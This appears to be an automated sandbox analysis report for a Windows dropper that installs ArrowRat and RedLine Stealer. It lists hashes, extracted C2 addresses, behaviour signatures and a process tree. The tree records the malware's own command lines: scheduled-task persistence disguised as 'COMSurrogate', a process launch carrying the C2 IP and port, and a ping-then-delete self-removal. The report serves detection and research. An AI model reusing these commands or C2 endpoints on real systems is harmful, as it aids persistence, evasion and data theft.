Analysis

  • max time kernel
    120s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2022 20:10

General

  • Target

    tmp.exe

  • Size

    18.4MB

  • MD5

    464502cbaae7b9ed1cd6da844d38ba86

  • SHA1

    30dd42539cbfad04564f9db45ca40f2b9e81546c

  • SHA256

    6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4

  • SHA512

    e74b45702eeaca95bc6c9f2aeea8a5958a425dc1f45ecfb127e286a39eb668243b41e56c705ae5fe7a72ff1ab691948adf29ddd6de18509421fa415647a36b59

  • SSDEEP

    98304:2pgc9WBd2/ojIbrK51bnqvMwqwWhWznbdyxDDFC4B14d+iXLfg0rf2a33OXA7zTg:2pgnBkbYEMUWIzbdyxDDFCXpZU

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

213.239.219.58:1337

Mutex

nPxRArUjc

Extracted

Family

redline

Botnet

@NoxyCloud

C2

85.192.63.57:34210

Attributes
  • auth_value

    20dc074852db65a2b74addf964cf576e

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 9 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
      PID:2376
    • C:\Users\Admin\AppData\Local\Temp\tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
      1⤵
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        2⤵
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2224
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice.pdf"
          3⤵
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3592
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2400
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D1A32B0FF9FEE30EF866219D17F35A8A --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              5⤵
                PID:1160
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=76235904D0D319AF3994BFE77FFEC537 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=76235904D0D319AF3994BFE77FFEC537 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1
                5⤵
                  PID:3136
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2BBE79CCB81E0652D8CDD8046EB335BA --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                    PID:1944
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=308D3CA27557840012F9B5B415F097B4 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=308D3CA27557840012F9B5B415F097B4 --renderer-client-id=5 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job /prefetch:1
                    5⤵
                      PID:1196
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=64EC4B0EE101446867FFC9CF1C0E8EDB --mojo-platform-channel-handle=1844 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      5⤵
                        PID:4044
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9F3E6E81539061B6CE6FB00F4C08C931 --mojo-platform-channel-handle=2104 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        5⤵
                          PID:3644
                    • C:\Users\Admin\AppData\Local\Temp\MRH.exe
                      "C:\Users\Admin\AppData\Local\Temp\MRH.exe" 0
                      3⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3144
                      • C:\Windows\SysWOW64\schtasks.exe
                        "C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
                        4⤵
                        • Creates scheduled task(s)
                        PID:1296
                      • C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
                        "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe" 0
                        4⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2428
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          5⤵
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of SetWindowsHookEx
                          PID:2780
                          • C:\Windows\explorer.exe
                            "C:\Windows\explorer.exe"
                            6⤵
                            • Modifies Installed Components in the registry
                            • Enumerates connected drives
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:2316
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc
                            6⤵
                              PID:4124
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc
                              6⤵
                                PID:2572
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\MRH.exe"
                            4⤵
                              PID:2516
                              • C:\Windows\SysWOW64\chcp.com
                                chcp 65001
                                5⤵
                                  PID:492
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping 127.0.0.1
                                  5⤵
                                  • Runs ping.exe
                                  PID:960
                            • C:\Users\Admin\AppData\Local\Temp\ROR.exe
                              "C:\Users\Admin\AppData\Local\Temp\ROR.exe" 0
                              3⤵
                              • Executes dropped EXE
                              PID:3120
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                4⤵
                                  PID:4840
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:3932
                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                              1⤵
                                PID:4072
                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                1⤵
                                  PID:1952

                                Network

                                MITRE ATT&CK Enterprise v6

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

                                  Filesize

                                  717B

                                  MD5

                                  ec8ff3b1ded0246437b1472c69dd1811

                                  SHA1

                                  d813e874c2524e3a7da6c466c67854ad16800326

                                  SHA256

                                  e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

                                  SHA512

                                  e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

                                  Filesize

                                  192B

                                  MD5

                                  ce97a3784f0bc39784ef388c0e82099e

                                  SHA1

                                  863ac930ccb0f4dffbd3247b8bdc4273b9bcdcf6

                                  SHA256

                                  b3b7bb3b695629872f3390628cb649ec6c464a92b8c383e299474dcf54914eaa

                                  SHA512

                                  a48e31c090b2300b42893c0899d93f0e823c1b7c48880bb89381786beeb87255a53d94a8f49a7fb110cf2c55ed7b0a3d00c6e1bc946a48820da9cf470424a833

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\47NRIJ2V\library[1].bin

                                  Filesize

                                  259KB

                                  MD5

                                  94aafe6b249b7f529f9d66a6f7d0b80e

                                  SHA1

                                  a83eee4aa9c936a8e423c4b2b7d2b1036a9a0c44

                                  SHA256

                                  41c631caa7c9e95166917bec39627c488400d180622e4b2bb3a3629732692b54

                                  SHA512

                                  e94befd6c2462bbab13e0e66569c78d34d075f15a9923713f9e72bbd7f791103ef20161b7f830a9ad1f2745ccd9e60bbbe7540f87c025d3be4b0dba3d546d5cb

                                • C:\Users\Admin\AppData\Local\Temp\Invoice.pdf

                                  Filesize

                                  163KB

                                  MD5

                                  5441d36f8dcfdd31e75562b380bea7a8

                                  SHA1

                                  70053ce7491743efacaa4b40f452efb3f32df4e8

                                  SHA256

                                  58098a6f25d3fb423b49a97cf917a406c5841d7ac792ef04ecb9646f5629baf3

                                  SHA512

                                  06a19ace54e2ccb25faaba3dce7a4b72010d1002efbd5d3e1cab1f23493dd8ada55803e9cd695a79c6030204224a84c5192b334b2e8c1007713e1f472f645bbe

                                • C:\Users\Admin\AppData\Local\Temp\MRH.exe

                                  Filesize

                                  1.9MB

                                  MD5

                                  18585735c8866b21e2723a6f020bafd0

                                  SHA1

                                  afb5b2c9d5ca57501835b0c56fd97b0641f01d88

                                  SHA256

                                  e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

                                  SHA512

                                  88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

                                • C:\Users\Admin\AppData\Local\Temp\MRH.exe

                                  Filesize

                                  1.9MB

                                  MD5

                                  18585735c8866b21e2723a6f020bafd0

                                  SHA1

                                  afb5b2c9d5ca57501835b0c56fd97b0641f01d88

                                  SHA256

                                  e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

                                  SHA512

                                  88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8

                                • C:\Users\Admin\AppData\Local\Temp\ROR.exe

                                  Filesize

                                  1.7MB

                                  MD5

                                  85ea4565608d2f6c35decb6ed8547749

                                  SHA1

                                  e15ae6c93c9e998b030609fdf4b3274925694229

                                  SHA256

                                  f6706aafbeb4e8e10478bb1fd5b171e2f7f13399416344aba46233593e6f5d69

                                  SHA512

                                  762b5e5293067c484ca54fa297f5770217275a7594083b64b15ed65955f64ba158bbf58a7713419c2dc15d265a7bf8c85b4f11c8fd27e62ba21f429493df4dd5

                                • C:\Users\Admin\AppData\Local\Temp\ROR.exe

                                  Filesize

                                  1.7MB

                                  MD5

                                  85ea4565608d2f6c35decb6ed8547749

                                  SHA1

                                  e15ae6c93c9e998b030609fdf4b3274925694229

                                  SHA256

                                  f6706aafbeb4e8e10478bb1fd5b171e2f7f13399416344aba46233593e6f5d69

                                  SHA512

                                  762b5e5293067c484ca54fa297f5770217275a7594083b64b15ed65955f64ba158bbf58a7713419c2dc15d265a7bf8c85b4f11c8fd27e62ba21f429493df4dd5

                                • C:\Users\Admin\AppData\Local\Temp\advapi32.dll

                                  Filesize

                                  262KB

                                  MD5

                                  1b51fec95f5403305749c4bcb3485b14

                                  SHA1

                                  f4974196213a94911c850504924f38cd9e7fe889

                                  SHA256

                                  3c0d3f9a776c503eca4e0a014006fe1a8f53e5e22138f6add9e45ad0fbf8844e

                                  SHA512

                                  6e8aa862cb2d95fe67c212de2ee59f903a3de6e16bdd87918e31bc2d7de9a1bdd61f756f1bdf35aa41c7e3620650b9ad9bbaa65487d7152fdf7420767a91e90d

                                • C:\Users\Admin\AppData\Local\Temp\advapi32.exe

                                  Filesize

                                  262KB

                                  MD5

                                  1b51fec95f5403305749c4bcb3485b14

                                  SHA1

                                  f4974196213a94911c850504924f38cd9e7fe889

                                  SHA256

                                  3c0d3f9a776c503eca4e0a014006fe1a8f53e5e22138f6add9e45ad0fbf8844e

                                  SHA512

                                  6e8aa862cb2d95fe67c212de2ee59f903a3de6e16bdd87918e31bc2d7de9a1bdd61f756f1bdf35aa41c7e3620650b9ad9bbaa65487d7152fdf7420767a91e90d

                                • C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe

                                  Filesize

                                  425.7MB

                                  MD5

                                  09bd24bbe4f9b31fa34750fe5c0410ab

                                  SHA1

                                  32147686652543c780bacc2bb57adada3e4c8185

                                  SHA256

                                  24e491064509dd547bfa409e3ca70b708d812cfae6959d0bd6fe038809823c49

                                  SHA512

                                  443cd7feae0a7c2e8b884e0acc5dd6a5f56511fc06a7f7a5be1e31746ac9d64e35ccd883988a456431c6c757fa20d4263fcffbe84f339cb646068d36002a1a5f

                                • C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe

                                  Filesize

                                  427.7MB

                                  MD5

                                  e50953c07f7c45d0402f18e71c43e11b

                                  SHA1

                                  e30e81c1752f7f8541dc90d7bfce537098d21799

                                  SHA256

                                  54662ef836b3d63232b84de6f8dfcb4009014d81357d8bf040cc107aea8cf4f9

                                  SHA512

                                  a043d963b20250451ad568e524d0122821c4c15311c4f5899e9739e6862f25f2e5152b86ac58e6535ffc041c03ef4800ca0870c2ede4138bcb359b5639224842

                                • memory/848-132-0x0000000000570000-0x00000000017DA000-memory.dmp

                                  Filesize

                                  18.4MB

                                • memory/848-133-0x00007FFE943A0000-0x00007FFE94E61000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/848-138-0x00007FFE943A0000-0x00007FFE94E61000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1952-245-0x000001740D731000-0x000001740D734000-memory.dmp

                                  Filesize

                                  12KB

                                • memory/1952-240-0x000001741EF18000-0x000001741EF20000-memory.dmp

                                  Filesize

                                  32KB

                                • memory/1952-234-0x000001740D4E0000-0x000001740D500000-memory.dmp

                                  Filesize

                                  128KB

                                • memory/1952-243-0x000001740D731000-0x000001740D734000-memory.dmp

                                  Filesize

                                  12KB

                                • memory/1952-244-0x000001740D731000-0x000001740D734000-memory.dmp

                                  Filesize

                                  12KB

                                • memory/1952-239-0x000001741DEC8000-0x000001741DED0000-memory.dmp

                                  Filesize

                                  32KB

                                • memory/1952-233-0x000001740CBC0000-0x000001740CBE0000-memory.dmp

                                  Filesize

                                  128KB

                                • memory/1952-242-0x000001740D731000-0x000001740D734000-memory.dmp

                                  Filesize

                                  12KB

                                • memory/2224-141-0x0000000000400000-0x0000000000405000-memory.dmp

                                  Filesize

                                  20KB

                                • memory/2224-188-0x0000000000400000-0x0000000000405000-memory.dmp

                                  Filesize

                                  20KB

                                • memory/2224-167-0x0000000000400000-0x0000000000405000-memory.dmp

                                  Filesize

                                  20KB

                                • memory/2224-137-0x0000000000400000-0x0000000000405000-memory.dmp

                                  Filesize

                                  20KB

                                • memory/2224-134-0x0000000000400000-0x0000000000405000-memory.dmp

                                  Filesize

                                  20KB

                                • memory/2428-180-0x0000000002E53000-0x0000000003748000-memory.dmp

                                  Filesize

                                  9.0MB

                                • memory/2428-183-0x0000000002E53000-0x0000000003748000-memory.dmp

                                  Filesize

                                  9.0MB

                                • memory/2428-193-0x0000000010B80000-0x0000000010D6F000-memory.dmp

                                  Filesize

                                  1.9MB

                                • memory/2428-194-0x0000000010B80000-0x0000000010D6F000-memory.dmp

                                  Filesize

                                  1.9MB

                                • memory/2428-184-0x000000000389B000-0x0000000003A62000-memory.dmp

                                  Filesize

                                  1.8MB

                                • memory/2428-199-0x0000000002E50000-0x0000000002E56000-memory.dmp

                                  Filesize

                                  24KB

                                • memory/2428-200-0x000000000389B000-0x0000000003A62000-memory.dmp

                                  Filesize

                                  1.8MB

                                • memory/2572-209-0x0000000005BC0000-0x0000000005C26000-memory.dmp

                                  Filesize

                                  408KB

                                • memory/2572-206-0x0000000000400000-0x0000000000418000-memory.dmp

                                  Filesize

                                  96KB

                                • memory/2572-210-0x0000000006470000-0x00000000064C0000-memory.dmp

                                  Filesize

                                  320KB

                                • memory/2780-198-0x0000000000400000-0x000000000042C000-memory.dmp

                                  Filesize

                                  176KB

                                • memory/2780-202-0x0000000005620000-0x00000000056BC000-memory.dmp

                                  Filesize

                                  624KB

                                • memory/2780-201-0x0000000005AE0000-0x0000000006084000-memory.dmp

                                  Filesize

                                  5.6MB

                                • memory/2780-196-0x0000000000400000-0x000000000042C000-memory.dmp

                                  Filesize

                                  176KB

                                • memory/2780-207-0x0000000005860000-0x00000000058F2000-memory.dmp

                                  Filesize

                                  584KB

                                • memory/2780-208-0x00000000057F0000-0x00000000057FA000-memory.dmp

                                  Filesize

                                  40KB

                                • memory/3120-215-0x0000000011560000-0x00000000116D4000-memory.dmp

                                  Filesize

                                  1.5MB

                                • memory/3120-225-0x000000000374D000-0x00000000038CE000-memory.dmp

                                  Filesize

                                  1.5MB

                                • memory/3120-211-0x000000000374D000-0x00000000038CE000-memory.dmp

                                  Filesize

                                  1.5MB

                                • memory/3120-191-0x0000000002E95000-0x0000000003632000-memory.dmp

                                  Filesize

                                  7.6MB

                                • memory/3120-214-0x0000000002E95000-0x0000000003632000-memory.dmp

                                  Filesize

                                  7.6MB

                                • memory/3120-216-0x0000000011560000-0x00000000116D4000-memory.dmp

                                  Filesize

                                  1.5MB

                                • memory/3144-173-0x0000000002A50000-0x0000000003345000-memory.dmp

                                  Filesize

                                  9.0MB

                                • memory/3144-179-0x0000000003493000-0x000000000365A000-memory.dmp

                                  Filesize

                                  1.8MB

                                • memory/3144-171-0x0000000002A50000-0x0000000003345000-memory.dmp

                                  Filesize

                                  9.0MB

                                • memory/3144-172-0x0000000003493000-0x000000000365A000-memory.dmp

                                  Filesize

                                  1.8MB

                                • memory/4840-232-0x0000000005520000-0x000000000555C000-memory.dmp

                                  Filesize

                                  240KB

                                • memory/4840-231-0x00000000054C0000-0x00000000054D2000-memory.dmp

                                  Filesize

                                  72KB

                                • memory/4840-230-0x0000000005590000-0x000000000569A000-memory.dmp

                                  Filesize

                                  1.0MB

                                • memory/4840-229-0x0000000005A90000-0x00000000060A8000-memory.dmp

                                  Filesize

                                  6.1MB

                                • memory/4840-219-0x0000000000400000-0x0000000000428000-memory.dmp

                                  Filesize

                                  160KB

                                • memory/4840-222-0x0000000000400000-0x0000000000428000-memory.dmp

                                  Filesize

                                  160KB

                                • memory/4840-247-0x0000000006530000-0x00000000065A6000-memory.dmp

                                  Filesize

                                  472KB

                                • memory/4840-248-0x00000000070D0000-0x0000000007292000-memory.dmp

                                  Filesize

                                  1.8MB

                                • memory/4840-249-0x00000000077D0000-0x0000000007CFC000-memory.dmp

                                  Filesize

                                  5.2MB